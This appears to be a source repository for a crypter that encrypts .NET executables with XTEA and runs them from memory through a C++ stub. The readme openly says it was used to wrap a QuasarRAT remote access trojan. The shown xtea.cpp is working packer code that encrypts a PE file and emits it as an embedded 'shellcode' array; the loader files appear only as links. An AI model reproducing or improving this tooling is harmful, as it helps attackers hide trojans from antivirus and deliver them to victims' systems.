├── netstub.cpp
├── pch.h
├── readme.md
└── xtea.cpp


/netstub.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/freesoul/netstub/354005bfbbf4186b235fc8a75152a085de792bdd/netstub.cpp


--------------------------------------------------------------------------------
/pch.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/freesoul/netstub/354005bfbbf4186b235fc8a75152a085de792bdd/pch.h


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # Create C++ Stubs for .NET executables
 3 | 
 4 | ## Motivation
 5 | 
 6 | [Simple Xtea Crypter](https://github.com/NateBrune/Simple-XTEA-Crypter) shows how to cypher a PE file with Xtea and running it from memory in a C++ compiled program. However, this did not appear to work for .NET executables.
 7 | 
 8 | 
 9 | ## Steps with references
10 | 
11 | 1. Grabbed and used [Simple Xtea Crypter](https://github.com/NateBrune/Simple-XTEA-Crypter) code to create a Xtea cyphered PE shellcode. You can simply "gcc xtea -o xtea.exe" it. Then you drag your .NET PE into it, and shellcode.h will appear.
12 | 
13 | Now, if you follow the steps described in that project with its runPE, it will just not work. Instead:
14 | 
15 | 
16 | 2. Grabbed, slightly modified, and used this code about [loading assembly code into a .NET environment with C++](https://www.codeproject.com/Articles/1236146/Protecting-NET-plus-Application-By-Cplusplus-Unman), and put the pieces together. Ah well, it did not work and I debugged to figure out that "SAFEARRAY *psaStaticMethodArgs = SafeArrayCreateVector(VT_VARIANT, 0, 0);" was creating wrong arguments for the .NET application (which in my case was a QuasaRAT executable, which expects some args in its Main). So I researched how to construct correctly these argv and argc (found it in a web which I do not remember) and included it.
17 | 
18 | 
19 | 3. Make sure you compile netstub.cpp with x86 or x64 depending on the .NET PE. Ah yes, and I used MVS 2017, this would not work with gcc.
20 | 
21 | 
22 | Jean 09/2018
23 | 


--------------------------------------------------------------------------------
/xtea.cpp:
--------------------------------------------------------------------------------
  1 | #include <iostream>
  2 | #include <fstream>
  3 | #include <stdint.h>
  4 | #include <cstring>
  5 | #include <cstdlib>
  6 | #include <stdlib.h>
  7 | using namespace std;
  8 | 
  9 | unsigned int key[4]={0xAAAA,0xA123,0x3211,0x4444};  /* Chose a password in hex   */
 10 | #define BLOCK_SIZE 8                               /* Make sure you change both */
 11 |                                                   /* xtea.cpp and netstub.cpp     */
 12 | /*
 13 |     XTea reference code taken from
 14 |     http://en.wikipedia.org/wiki/XTEA
 15 | */
 16 | void encipher(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]){
 17 |     unsigned int i;
 18 |     uint32_t v0=v[0], v1=v[1], sum=0, delta=0x9E3779B9;
 19 |     for (i=0; i < num_rounds; i++){
 20 |         v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
 21 |         sum += delta;
 22 |         v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);
 23 |     }
 24 |     v[0]=v0; v[1]=v1;
 25 | }
 26 | 
 27 | void decipher(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]){
 28 |      unsigned int i;
 29 |      uint32_t v0=v[0], v1=v[1], delta=0x9E3779B9, sum=delta*num_rounds;
 30 |      for (i=0; i < num_rounds; i++){
 31 |         v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum>>11) & 3]);
 32 |         sum -= delta;
 33 |         v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
 34 |      }
 35 |      v[0]=v0; v[1]=v1;
 36 | }
 37 | 
 38 | void crypto(char filepath[] ,bool cipher){
 39 |       fstream dat(filepath,ios::in | ios::out | ios::binary); //Open the file
 40 |       if(!dat){
 41 |         cout << "I can not read from the file you provided. Sorry :\(" << endl;
 42 |         system("pause");
 43 |         exit(-1);
 44 |       }
 45 | 
 46 |       unsigned size;
 47 | 
 48 |       dat.seekg(0,ios::end);
 49 |       size=dat.tellg();
 50 |       dat.seekg(ios::beg);
 51 | 
 52 |       dat.clear();
 53 | 
 54 |       unsigned pos;
 55 | 
 56 |       int n_blocks=size/BLOCK_SIZE;
 57 |       if(size%BLOCK_SIZE!=0)
 58 |           ++n_blocks;
 59 | 
 60 |       for(int i=0;i<n_blocks;i++){ //for every character in the executable, encipher the character
 61 |           unsigned char data[BLOCK_SIZE];
 62 |           pos=dat.tellg();
 63 | 
 64 |           dat.read((char*)data,BLOCK_SIZE);
 65 | 
 66 |           if(cipher) encipher(32,(uint32_t*)data,key);
 67 |           else decipher(32,(uint32_t*)data,key);
 68 | 
 69 |           dat.seekp(pos);
 70 |           dat.write((char*)data,BLOCK_SIZE);
 71 | 
 72 |           memset(data,0,BLOCK_SIZE);
 73 |       }
 74 |       dat.close(); //all the enciphered data was sent back the the executable
 75 | }
 76 | 
 77 | int shellcode(std::string file){
 78 |     FILE *sf; //executable file
 79 |     FILE *f; //shellcode.h
 80 |     int i, c;
 81 |     char *arr_name;
 82 |     sf = fopen(file.c_str(), "rb");
 83 |     if (sf == NULL) {
 84 |         fprintf(stderr, "fopen(%s) Failed. Could'nt open file.", file.c_str());
 85 |         return 1;
 86 |     }
 87 |     arr_name = "shellcode";
 88 |     f = fopen("shellcode.h","w");
 89 |     fprintf(f, "unsigned char %s[] = {", arr_name);
 90 | 
 91 |     for (i=0;;i++) {                        //grab the shellcode and drop it in
 92 |         if ((c = fgetc(sf)) == EOF) break; //shellcode.h
 93 |         if (i != 0) fprintf(f,",");
 94 |         if ((i % 12) == 0) fprintf(f,"\n\t");
 95 |         fprintf(f,"0x%.2X", (unsigned char)c);
 96 |     }
 97 | 
 98 |     fprintf(f,"\n\t};\n");
 99 | 
100 | 	fprintf(f,"unsigned int size = %i;\n", i);
101 | 
102 |     fclose(sf);
103 |     fclose(f);
104 |     return 0;
105 | }
106 | 
107 | int main(int argc, char *argv[]){
108 |     if (argc < 2) { //RTFM
109 |         fprintf(stderr, "Usage: %s [filepath]\n", argv[0]);
110 |         return 1;
111 |     }
112 |     crypto(argv[1], true); //cipher
113 |     cout << "Finished Ciphering " << argv[1] << endl;
114 |     shellcode(argv[1]); //generate shellcode
115 |     cout << "Finished Generating" << argv[1] << endl;
116 |     system("pause"); //press any key to continue
117 |     return 0;
118 | }
119 | 


--------------------------------------------------------------------------------